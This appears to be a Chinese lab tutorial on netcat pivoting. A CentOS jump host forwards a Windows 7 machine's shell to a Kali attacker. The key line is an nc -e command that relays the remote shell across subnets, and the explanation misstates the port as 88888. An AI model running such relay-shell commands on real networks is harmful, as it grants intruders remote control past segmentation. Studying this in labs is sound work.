【需求】
现在想要实现两个不同网段的私网之间相互通信,我们该如何做呢?
🔴实验环境:
【kali(攻击端)】:192.168.10.131
【centos7(跳板机)】:192.168.10.39;172.16.80.130
【win7】:172.16.80.131
工具:netcat
【kali】
:
开启监听
【centos7】
:
【kali】
:
获得对方的shell
我们通过-e
参数把自身的shell发送到对方那里,那么既然-e是用于发送指令的命令,我们也可以通过win7开启监听,然后我们在centos连接kali的时候,通过-e参数把win7的监听,是不是把win7的指令发送到kali上。那么也可以通过这种方式进行转发。
在实战中,需要保持网络的稳定性,保证操作过程的稳定。
🟠本次实验正式开始。
let`s go❗
第一步,开监听
【kali】:
【win7】:
通过正向连接的方式,把win7的shell挂在8888端口上面。
两边都开监听,需要在centos7(跳板机)上面做一次转发。
第二步,配置跳板机
【centos】:
查找nc的路径。
第三步,最后效果
【kali】:
成功得到win7 的 shell。
【win7】:
【centos】:
🟡重点:
nc -v 192.168.10.131 9999 -e "/usr/bin/nc -v 172.16.80.131 8888"
-v 动态显示,可加可不加。
192.168.10.131 : 转发地址。
9999 : 监听的端口。
-e “/usr/bin/nc 172.16.80.131 88888” : -e,选择我们要发送的内容;/usr/bin/nc是nc的指定路径;172.16.80.131,win7的信息;先去连接win7的8888端口,获取到的东西, 再通过 nc 传输到kali。